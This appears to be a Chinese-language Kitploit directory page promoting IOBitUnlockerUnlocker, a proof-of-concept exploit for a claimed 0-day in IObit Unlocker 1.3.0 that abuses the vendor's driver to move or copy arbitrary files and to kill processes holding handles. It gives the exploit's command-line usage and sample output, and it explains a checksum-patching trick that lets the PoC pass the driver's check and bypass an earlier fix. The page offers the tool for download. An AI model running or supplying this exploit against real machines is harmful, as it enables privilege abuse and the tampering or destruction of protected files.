Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
IOBitUnlockerUnlocker — (0 day) CVE-2026-37334 可移动或复制任意文件。通过校验和技巧绕过先前补丁。IObit Unlocker v. 1.3.0 | Kitploit
工具/GitHubGitHub/nasawyer7/iobitunlockerunlocker
权限提升漏洞利用框架漏洞分析漏洞利用二进制利用
GitHubnasawyer7/iobitunlockerunlocker

IOBitUnlockerUnlocker

(0 day) CVE-2026-37334 可移动或复制任意文件。通过校验和技巧绕过先前补丁。IObit Unlocker v. 1.3.0

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

简介

(0 day)移动或复制任意文件。通过校验和技巧绕过之前的补丁。

Writeup:https://nathan2.com/files/iobit.pdf 总体信息:https://nathan2.com/posts/iobit/

我是在不知道已有其他先前漏洞利用的情况下发现此漏洞的。不过,此漏洞绕过了 IObit 所做的补丁。适用于 1.3.0 版本。

用法:

root@kitploit:~
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- 发送请求 ---
源:C:\copied.txt
目标:C:\t.txt
子类型:4 | 标志:1
IOCTL 成功。驱动程序返回 4 字节。
验证:目标文件存在/可访问。

更多标志:

root@kitploit:~
用法:UnlockerCLI.exe <源路径> <目标路径> <子类型> <标志>
示例:UnlockerCLI.exe "C:\带空格路径\file.txt" "C:\backup\file.txt" 3(子类型) 5(操作标志)
子类型:(至少是我使用的)3=移动,4=复制
操作标志:0=不移除句柄,1=移除句柄,2=终止持有句柄的进程,4=终止进程并移除句柄,5???实验性。

附带的可执行文件应可正常运行且已打补丁。如果不行,请阅读下文。

使用校验和修补程序修补 PoC。操作如下:

root@kitploit:~
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
原始文件大小:235449 字节
当前交替和:11044471
当前 XOR 和:43
文件已具有正确的校验和。无需更改。

这将允许可执行文件与 IObitUnlocker 驱动程序通信。

下载工具